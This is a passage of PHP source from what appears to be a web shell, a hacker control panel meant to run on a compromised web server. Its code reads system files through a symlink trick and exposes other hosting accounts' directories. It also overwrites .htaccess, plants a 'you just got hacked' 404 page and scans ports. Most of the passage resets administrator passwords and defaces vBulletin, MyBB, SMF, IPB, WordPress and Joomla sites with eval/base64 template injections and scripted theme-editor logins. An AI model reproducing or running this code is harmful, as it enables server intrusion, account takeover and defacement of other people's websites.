2637 if(!isset($_GET['file']))
2638 {
2639 ?>
2640 <center>
2641 <form onSubmit="getdata('symlinkmyfile',file.value);return false;">
2642 <input type="text" class="box" name="file" size="50" value="/etc/passwd">
2643 <input type="button" value="Create Symlink" onClick="getdata('symlinkmyfile',file.value)" class="but">
2644 </form></center>
2645 <br><br>
2646 <?php
2647 }
2648}
2649else if(isset($_GET['symlinkmyfile']))
2650{
2651 if($os == "Linux")
2652 {
2653 $fakedir="cx";
2654 $fakedep=16;
2655
2656 $num=0; // offset of symlink.$num
2657
2658 if(!empty($_GET['myfile']))
2659 $file=$_GET['myfile'];
2660 else $file="";
2661
2662 if(empty($file))
2663 exit;
2664
2665 if(!is_writable("."))
2666 echo "not writable directory";
2667
2668 $level=0;
2669
2670 for($as=0;$as<$fakedep;$as++)
2671 {
2672 if(!file_exists($fakedir))
2673 mkdir($fakedir);
2674 chdir($fakedir);
2675 }
2676
2677 while(1<$as--) chdir("..");
2678
2679 $hardstyle = explode("/", $file);
2680
2681 for($a=0;$a<count($hardstyle);$a++)
2682 {
2683 if(!empty($hardstyle[$a]))
2684 {
2685 if(!file_exists($hardstyle[$a]))
2686 mkdir($hardstyle[$a]);
2687 chdir($hardstyle[$a]);
2688 $as++;
2689 }
2690 }
2691 $as++;
2692 while($as--)
2693 chdir("..");
2694
2695 @rmdir("fakesymlink");
2696 @unlink("fakesymlink");
2697
2698 @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
2699
2700 while(1)
2701 if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
2702 else $num++;
2703
2704 @unlink("fakesymlink");
2705 mkdir("fakesymlink");
2706
2707 echo '<CENTER>check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</CENTER>';
2708 }
2709 else
2710 echo '<CENTER>Cannot Create Symlink</CENTER>';
2711}
2712else if(isset($_POST['cpaneluser']))
2713{
2714 if(is_numeric($_POST['noofsubdomain']))
2715 {
2716 for($i=1;$i<=$_POST['noofsubdomain'];$i++)
2717 {
2718 $subDomain = randomt();
2719 echo make_subdomain($subDomain,$_POST['cpaneluser'],$_POST['cpanelpass'],$_POST['subindex']);
2720 }
2721 }
2722 else
2723 echo "Insert number";
2724}
2725else if(isset($_REQUEST['404new']))
2726{
2727 ?>
2728 <form>
2729 <center><textarea name=message cols=100 rows=18 class=box>lol! You just got hacked</textarea></br>
2730 <input type="button" onClick="my404page(message.value)" value=" Save " class=but></center>
2731 </br>
2732 </form>
2733 <?php
2734}
2735else if(isset($_REQUEST['404page']))
2736{
2737 $url = $_SERVER['REQUEST_URI'];
2738 $path=explode('/',$url);
2739 $url =str_replace($path[count($path)-1],'',$url);
2740 if(isset($_POST['message']))
2741 {
2742 if($myfile = fopen(".htaccess", "a"))
2743 {
2744 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
2745 if($myfilee = fopen("404.html", "w+"))
2746 {
2747 fwrite($myfilee, $_POST['message']);
2748 }
2749 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
2750 }
2751 else
2752 echo "<center>Cannot Set 404 Page</center>";
2753 }
2754 else if(strlen($ind) != 0)
2755 {
2756 if($myfile = fopen(".htaccess", "a"))
2757 {
2758 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
2759
2760 if($myfilee = fopen("404.html", "w+"))
2761 {
2762 fwrite($myfilee, base64_decode($ind));
2763
2764 fclose($myfilee);
2765 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
2766 }
2767 fclose($myfile);
2768 }
2769 else
2770 {
2771 echo "<center>Cannot Set 404 Page</center>";
2772 }
2773 }
2774 else
2775 echo "<center>Nothing Specified in the shell</center>";
2776}
2777else if(isset($_GET["symlink"]))
2778{
2779 $d0mains = @file("/etc/named.conf");
2780 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2781 $path=explode('/',$url);
2782 $url =str_replace($path[count($path)-1],'',$url);
2783 if($d0mains)
2784 {
2785 @mkdir("dhanush",0777);
2786 @chdir("dhanush");
2787 execmd("ln -s / root");
2788
2789 $file3 = 'Options all
2790 DirectoryIndex Sux.html
2791 AddType text/plain .php
2792 AddHandler server-parsed .php
2793 AddType text/plain .html
2794 AddHandler txt .html
2795 Require None
2796 Satisfy Any
2797 ';
2798 $fp3 = fopen('.htaccess','w');
2799 $fw3 = fwrite($fp3,$file3);
2800 @fclose($fp3);
2801
2802 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr align =center><td align=center><font size=3 >S. No.</font></td><td align=center><font size=3 >Domains</font></td><td align=center><font size=3 >Users</font></td><td align=center><font size=3 >Symlink</font></td><td align=center><font size=3 >Information</font></td></tr>";
2803
2804 $dcount = 1;
2805 foreach($d0mains as $d0main)
2806 {
2807 if(eregi("zone",$d0main))
2808 {
2809 preg_match_all('#zone "(.*)"#', $d0main, $domains);
2810 flush();
2811
2812 if(strlen(trim($domains[1][0])) > 2)
2813 {
2814 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2815
2816 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt>".$user['name']."</font></td><td><a href=".$url."dhanush/root/home/".$user['name']."/public_html target='_blank'><font class=txt>Symlink</font></a></td><td><font class=txt><a href=?info=".$domains[1][0]." target=_blank>info</a></font></td></tr>"; flush();
2817 $dcount++;
2818 }
2819 }
2820
2821 }
2822 echo "</table>";
2823 }
2824 else
2825 {
2826 if($os == "Linux")
2827 {
2828 ?>
2829 <div style="float:left;position:fixed;">
2830 <form>
2831 <table cellpadding="9">
2832 <tr>
2833 <th colspan="2">Get User Name</th>
2834 </tr>
2835 <tr>
2836 <td>Enter Website Name :</td>
2837 <td><input type="text" name="sitename" value="sitename.com" class="sbox"></td>
2838 </tr>
2839 <tr>
2840 <td align="center" colspan="2"><input type="button" onClick="getname(sitename.value)" value=" Get IT " class="but"></td>
2841 </tr>
2842 <tr>
2843 <td colspan=2 align=center><div style="width:250px;" id="showsite"></div></td>
2844 </tr>
2845 </table>
2846 </form>
2847 </div>
2848 <?php
2849 $TEST=@file('/etc/passwd');
2850 if ($TEST)
2851 {
2852 @mkdir("dhanush",0777);
2853 @chdir("dhanush");
2854 execmd("ln -s /root");
2855
2856$file3 = 'Options all
2857 DirectoryIndex Sux.html
2858 AddType text/plain .php
2859 AddHandler server-parsed .php
2860 AddType text/plain .html
2861 AddHandler txt .html
2862 Require None
2863 Satisfy Any
2864 ';
2865 $fp3 = fopen('.htaccess','w');
2866 $fw3 = fwrite($fp3,$file3);
2867 @fclose($fp3);
2868
2869 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
2870
2871
2872 $dcount = 1;
2873 $file = fopen("/etc/passwd", "r");
2874 //Output a line of the file until the end is reached
2875 while(!feof($file))
2876 {
2877 $s = fgets($file);
2878 $matches = array();
2879 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2880 $matches = str_replace("home/","",$matches[1]);
2881 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2882 continue;
2883 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
2884 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2885 $dcount++;
2886 }
2887 fclose($file);
2888
2889 echo "</table>";
2890 }
2891 else
2892 {
2893 @mkdir("dhanush",0777);
2894 @chdir("dhanush");
2895 execmd("ln -s / root");
2896 $file3 = 'Options all
2897 DirectoryIndex Sux.html
2898 AddType text/plain .php
2899 AddHandler server-parsed .php
2900 AddType text/plain .html
2901 AddHandler txt .html
2902 Require None
2903 Satisfy Any
2904 ';
2905 $fp3 = fopen('.htaccess','w');
2906 $fw3 = fwrite($fp3,$file3);
2907 @fclose($fp3);
2908
2909 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
2910
2911 $temp = "";
2912 $val1 = 0;
2913 $val2 = 1000;
2914 for(;$val1 <= $val2;$val1++)
2915 {
2916 $uid = @posix_getpwuid($val1);
2917 if ($uid)
2918 $temp .= join(':',$uid)."\n";
2919 }
2920 echo '<br/>';
2921 $temp = trim($temp);
2922
2923 $file5 = fopen("test.txt","w");
2924 fputs($file5,$temp);
2925 fclose($file5);
2926
2927 $dcount = 1;
2928 $file = fopen("test.txt", "r");
2929 while(!feof($file))
2930 {
2931 $s = fgets($file);
2932 $matches = array();
2933 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2934 $matches = str_replace("home/","",$matches[1]);
2935 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2936 continue;
2937 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
2938 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2939 $dcount++;
2940 }
2941 fclose($file);
2942 echo "</table>";
2943 unlink("test.txt");
2944 }
2945 }
2946 else
2947 echo "<center><font size=4 >Cannot create Symlink</font></center>";
2948 }
2949}
2950else if(isset($_GET['host']) && isset($_GET['protocol']))
2951{
2952 echo "Open Ports: ";
2953 $host = $_GET['host'];
2954 $proto = $_GET['protocol'];
2955 $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
2956 for($current = 0; $current <= 23; $current++)
2957 {
2958 $currents = $myports[$current];
2959 $service = getservbyport($currents, $proto);
2960 // Try to connect to port
2961 $result = fsockopen($host, $currents, $errno, $errstr, 1);
2962 // Show results
2963 if($result)
2964 echo "<font class=txt>$currents, </font>";
2965 }
2966}
2967else if(isset($_REQUEST['forumpass']))
2968{
2969 $localhost = $_GET['f1'];
2970 $database = $_GET['f2'];
2971 $username = $_GET['f3'];
2972 $password = $_GET['f4'];
2973 $prefix = $_GET['prefix'];
2974 $newpass = $_GET['newpass'];
2975 $uid = $_GET['uid'];
2976
2977 if($_GET['forums'] == "vb")
2978 {
2979 $newpass = $_GET['newipbpass'];
2980 $uid = $_GET['ipbuid'];
2981 $con = mysql_connect($localhost,$username,$password);
2982 $db = mysql_select_db($database,$con);
2983 $salt = "eghjghrtd";
2984 $newpassword = md5(md5($newpass) . $salt);
2985 if($prefix == "" || $prefix == null)
2986 $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
2987 else
2988 $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
2989 if($sql)
2990 {
2991 mysql_close($con);
2992 echo "<font class=txt>Password Changed Successfully</font>";
2993 }
2994 else
2995 echo "Cannot Change Password";
2996 }
2997 else if($_GET['forums'] == "mybb")
2998 {
2999 $newpass = $_GET['newipbpass'];
3000 $uid = $_GET['ipbuid'];
3001 $con = mysql_connect($localhost,$username,$password);
3002 $db = mysql_select_db($database,$con);
3003 $salt = "jeghj";
3004 $newpassword = md5(md5($salt).md5($newpass));
3005 if($prefix == "" || $prefix == null)
3006 $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
3007 else
3008 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
3009 if($sql)
3010 {
3011 mysql_close($con);
3012 echo "<font class=txt>Password Changed Successfully</font>";
3013 }
3014 else
3015 echo "Cannot Change Password";
3016 }
3017 else if($_GET['forums'] == "smf")
3018 {
3019 $newpass = $_GET['newipbpass'];
3020 $uid = $_GET['ipbuid'];
3021 $con = mysql_connect($localhost,$username,$password);
3022 $db = mysql_select_db($database,$con);
3023
3024 if($prefix == "" || $prefix == null)
3025 {
3026 $result = mysql_query("select member_name from smf_members where id_member = $uid");
3027 $row = mysql_fetch_array($result);
3028 $membername = $row['member_name'];
3029 $newpassword = sha1(strtolower($membername).$newpass);
3030 $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
3031 }
3032 else
3033
3034 {
3035 $result = mysql_query("select member_name from ".$prefix."members where id_member = $uid");
3036 $row = mysql_fetch_array($result);
3037 $membername = $row['member_name'];
3038 $newpassword = sha1(strtolower($membername).$newpass);
3039 $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
3040 }
3041 if($sql)
3042 {
3043 mysql_close($con);
3044 echo "<font class=txt>Password Changed Successfully</font>";
3045 }
3046 else
3047 echo "Cannot Change Password";
3048 }
3049 else if($_GET['forums'] == "phpbb")
3050 {
3051 $newpass = $_POST['newipbpass'];
3052 $uid = $_POST['ipbuid'];
3053 $con = mysql_connect($localhost,$username,$password);
3054 $db = mysql_select_db($database,$con);
3055
3056 $newpassword = md5($newpass);
3057 if(empty($prefix) || $prefix == null)
3058 $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'");
3059 else
3060 $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
3061 if($sql)
3062 {
3063 mysql_close($con);
3064 echo "<font class=txt>Password Changed Successfully</font>";
3065 }
3066 else
3067 echo "Cannot Change Password";
3068 }
3069 else if($_GET['forums'] == "ipb")
3070 {
3071 $newpass = $_POST['newipbpass'];
3072 $uid = $_POST['ipbuid'];
3073 $con = mysql_connect($localhost,$username,$password);
3074 $db = mysql_select_db($database,$con);
3075 $salt = "eghj";
3076 $newpassword = md5(md5($salt).md5($newpass));
3077 if($prefix == "" || $prefix == null)
3078 $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
3079 else
3080 $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
3081 if($sql)
3082 {
3083 mysql_close($con);
3084 echo "<font class=txt>Password Changed Successfully</font>";
3085 }
3086 else
3087 echo "Cannot Change Password";
3088 }
3089 else if($_GET['forums'] == "wp")
3090 {
3091 $uname = $_GET['uname'];
3092 $con = mysql_connect($localhost,$username,$password);
3093 $db = mysql_select_db($database,$con);
3094
3095 $newpassword = md5($newpass);
3096 $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname'");
3097 if($sql)
3098 {
3099 mysql_close($con);
3100 echo "<font class=txt>Password Changed Successfully</font>";
3101 }
3102 else
3103 echo "Cannot Change Password";
3104 }
3105 else if($_GET['forums'] == "joomla")
3106 {
3107 $newjoomlapass = $_GET['newjoomlapass'];
3108 $joomlauname = $_GET['username'];
3109 $con = mysql_connect($localhost,$username,$password);
3110 $db = mysql_select_db($database,$con);
3111
3112 $newpassword = md5($newjoomlapass);
3113 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname'");
3114 if($sql)
3115 {
3116 mysql_close($con);
3117 echo "<font class=txt>Password Changed Successfully</font>";
3118 }
3119 else
3120 echo "Cannot Change Password";
3121 }
3122}
3123else if(isset($_POST['forumdeface']))
3124{
3125 $localhost = $_POST['f1'];
3126 $database = $_POST['f2'];
3127 $username = $_POST['f3'];
3128 $password = $_POST['f4'];
3129 $index = $_POST['index'];
3130 $prefix = $_POST['tableprefix'];
3131
3132 if($_POST['forumdeface'] == "vb")
3133 {
3134 $con =@ mysql_connect($localhost,$username,$password);
3135 $db =@ mysql_select_db($database,$con);
3136 $index=str_replace('"','\\"',$index);
3137 $attack = "{\${eval(base64_decode(\'";
3138 $attack .= base64_encode("echo \"$index\";");
3139 $attack .= "\'))}}{\${exit()}}</textarea>";
3140 if($prefix == "" || $prefix == null)
3141 $query = "UPDATE template SET template = '$attack'";
3142 else
3143 $query = "UPDATE ".$prefix."template SET template = '$attack'";
3144 $result =@ mysql_query($query,$con);
3145 if($result)
3146 echo "<center><font class=txt size=4><blink>Vbulletin Forum Defaced Successfully</blink></font></center>";
3147 else
3148 echo "<center><font size=4><blink>Cannot Deface Vbulletin Forum</blink></font></center>";
3149 }
3150 else if($_POST['forumdeface'] == "mybb")
3151 {
3152 $con =@ mysql_connect($localhost,$username,$password);
3153 $db =@ mysql_select_db($database,$con);
3154 $attack = "{\${eval(base64_decode(\'";
3155 $attack .= base64_encode("echo \"$index\";");
3156 $attack .= "\'))}}{\${exit()}}</textarea>";
3157 $attack = str_replace('"',"\\'",$attack);
3158
3159 if($prefix == "" || $prefix == null)
3160 $query = "UPDATE mybb_templates SET template = '$attack'";
3161 else
3162 $query = "UPDATE ".$prefix."templates SET template = '$attack'";
3163 $result =@ mysql_query($query,$con);
3164 if($result)
3165 echo "<center><font class=txt size=4><blink>Mybb Forum Defaced Successfully</blink></font></center>";
3166 else
3167 echo "<center><font size=4><blink>Cannot Deface Mybb Forum</blink></font></center>";
3168 }
3169 else if($_POST['forumdeface'] == "smf")
3170 {
3171 $head = $_POST['head'];
3172 $catid = $_POST['f5'];
3173
3174 $con =@ mysql_connect($localhost,$username,$password);
3175 $db =@ mysql_select_db($database,$con);
3176 if($prefix == "" || $prefix == null)
3177 $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'";
3178 else
3179 $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'";
3180 $result =@ mysql_query($query,$con);
3181 if($result)
3182 echo "<center><font class=txt size=4><blink>SMF Forum Index Changed Successfully</blink></font></center>";
3183 else
3184 echo "<center><font size=4><blink>Cannot Deface SMF Forum</blink></font></center>";
3185 }
3186 else if($_POST['forumdeface'] == "ipb")
3187 {
3188 $head = $_POST['head'];
3189 $catid = $_POST['f5'];
3190
3191 $IPB = "forums";
3192 $con =@ mysql_connect($localhost,$username,$password);
3193 $db =@ mysql_select_db($database,$con);
3194 if($prefix == "" || $prefix == null)
3195 $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'");
3196 else
3197 $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'");
3198 if($result)
3199 echo "<center><font class=txt size=4><blink>Forum Defaced Successfully</blink></font></center>";
3200 else
3201
3202 echo "<center><font size=4><blink>Cannot Deface Forum</blink></font></center>";
3203 }
3204 else if($_POST['forumdeface'] == "wp")
3205 {
3206 $site_url = $_POST['siteurl'];
3207 $index = urlencode($index);
3208 $con =@ mysql_connect($localhost,$username,$password);
3209 $db =@ mysql_select_db($database,$con);
3210 $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.'");
3211 echo("<br>[+] Changing admin password to 123456789<br>");
3212
3213 if($req1)
3214 {
3215 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
3216 $data = mysql_fetch_array($req);
3217 if(empty($site_url))
3218 $site_url=$data["option_value"];
3219 $output .= "Site : ".$site_url."<br>";
3220
3221 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
3222 $data = mysql_fetch_array($req);
3223 $template = $data["option_value"];
3224
3225 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
3226 $data = mysql_fetch_array($req);
3227 $current_theme = $data["option_value"];
3228
3229 $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
3230 $url2=$site_url."/wp-login.php";
3231
3232 $ch = curl_init();
3233 curl_setopt($ch, CURLOPT_URL, $url2);
3234 curl_setopt($ch, CURLOPT_POST, 1);
3235 curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1");
3236 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3237 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
3238 curl_setopt($ch, CURLOPT_HEADER, 0);
3239 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
3240 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3241 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3242 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3243 $buffer = curl_exec($ch);
3244
3245 $pos = strpos($buffer,"action=logout");
3246 if($pos === false) {
3247 $output.= "[-] Successful Login<br />";
3248 } else {
3249 $output.= "[+] Successful Login<br />";
3250 }
3251
3252 $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.urlencode($template);
3253 curl_setopt($ch, CURLOPT_URL, $url2);
3254 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
3255 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
3256 curl_setopt($ch, CURLOPT_HEADER, 0);
3257 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3258 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3259 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3260 $buffer0 = curl_exec($ch);
3261
3262 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
3263 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
3264
3265 if(substr_count($_file,"index.php") != 0)
3266 {
3267 $url2=$site_url."/wp-admin/theme-editor.php";
3268 curl_setopt($ch, CURLOPT_URL, $url2);
3269 curl_setopt($ch, CURLOPT_POST, 1);
3270 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
3271 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3272 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3273 curl_setopt($ch, CURLOPT_HEADER, 0);
3274 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3275 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3276 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3277 $buffer = curl_exec($ch);
3278 curl_close($ch);
3279
3280 $pos = strpos($buffer,'<div id="message" class="updated">');
3281 $cond = 0;
3282 if($pos === false) {
3283 $output.= "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
3284 } else {
3285 $output.= "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
3286 $cond = 1;
3287 }
3288 }
3289 else
3290 {
3291 $url2=$site_url.'/wp-admin/theme-editor.php?file=/themes/'.$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
3292 curl_setopt($ch, CURLOPT_URL, $url2);
3293 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
3294 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
3295 curl_setopt($ch, CURLOPT_HEADER, 0);
3296 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3297 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3298 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3299 $buffer0 = curl_exec($ch);
3300
3301 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
3302 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
3303
3304
3305 $url2=$site_url."/wp-admin/theme-editor.php";
3306 curl_setopt($ch, CURLOPT_URL, $url2);
3307 curl_setopt($ch, CURLOPT_POST, 1);
3308 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
3309 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3310 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3311 curl_setopt($ch, CURLOPT_HEADER, 0);
3312 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3313 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3314 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3315 $buffer = curl_exec($ch);
3316 curl_close($ch);
3317
3318 $pos = strpos($buffer,'<div id="message" class="updated">');
3319 $cond = 0;
3320 if($pos === false) {
3321 $output.= "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
3322 } else {
3323 $output.= "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
3324 $cond = 1;
3325 }
3326 }
3327 } else {
3328 $output.= "[-] DB Error<br />";
3329 }
3330 echo $output;
3331 global $base_path;
3332 unlink($base_path.'COOKIE.txt');
3333 }
3334 else if($_POST['forumdeface'] == "joomla")
3335 {
3336 $site_url = $_POST['siteurl'];
3337 $dbprefix = $_POST['tableprefix'];
3338 $dbname = $_POST['f2'];
3339 $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['index']))))."'))); exit; ?>";
3340
3341 $co=randomt();
3342
3343 $link=mysql_connect($localhost,$username,$password) ;
3344 mysql_select_db($dbname,$link);
3345
3346 $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
3347
3348 $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
3349
3350 if ( $req )
3351 {
3352 $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
3353 $data = mysql_fetch_array($req);
3354 $template_name=$data["template"];
3355
3356 $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
3357 $data = mysql_fetch_array($req);
3358 $template_id=$data["extension_id"];
3359
3360 $url2=$site_url."/index.php";
3361
3362 $ch = curl_init();
3363 curl_setopt($ch, CURLOPT_URL, $url2);
3364 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3365 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3366 curl_setopt($ch, CURLOPT_HEADER, 1);
3367 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3368 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3369 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3370
3371
3372 $buffer = curl_exec($ch);
3373
3374 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
3375 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
3376
3377
3378 $url2=$site_url."/index.php";
3379 $ch = curl_init();
3380 curl_setopt($ch, CURLOPT_URL, $url2);
3381 curl_setopt($ch, CURLOPT_POST, 1);
3382 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
3383 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3384 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3385 curl_setopt($ch, CURLOPT_HEADER, 0);
3386 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3387 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3388 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3389 $buffer = curl_exec($ch);
3390
3391 $pos = strpos($buffer,"com_config");
3392 if($pos === false)
3393 {
3394 echo("<br>[-] Login Error");
3395 exit;
3396 }
3397
3398 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
3399 $ch = curl_init();
3400 curl_setopt($ch, CURLOPT_URL, $url2);
3401 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3402 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3403 curl_setopt($ch, CURLOPT_HEADER, 0);
3404 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3405 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3406
3407 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3408 $buffer = curl_exec($ch);
3409
3410 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
3411 if(!$hidden2)
3412 {
3413 echo("<br>[-] index.php Not found in Theme Editor");
3414 exit;
3415 }
3416
3417 $url2=$site_url."/index.php?option=com_templates&layout=edit";
3418
3419 $ch = curl_init();
3420 curl_setopt($ch, CURLOPT_URL, $url2);
3421 curl_setopt($ch, CURLOPT_POST, 1);
3422 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
3423
3424 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3425 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3426 curl_setopt($ch, CURLOPT_HEADER, 0);
3427 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3428 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3429 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3430 $buffer = curl_exec($ch);
3431
